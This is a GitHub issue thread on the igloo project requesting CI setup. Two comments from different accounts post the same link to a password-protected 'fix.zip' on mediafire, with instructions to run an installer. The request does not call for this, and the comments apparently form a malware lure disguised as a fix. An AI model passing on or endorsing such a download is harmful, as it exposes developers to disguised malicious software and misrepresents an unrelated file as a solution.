### ISSUE TITLE
Add CI for igloo

### ISSUE THREAD

**Issue by raindust** [soonlabs/igloo#10]
Please note that unit tests should be run using `make test` instead of `cargo test`, as `make test` includes some initialization steps beyond the code itself.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ace155** [comment]
https://github.com/soonlabs/igloo/pull/14
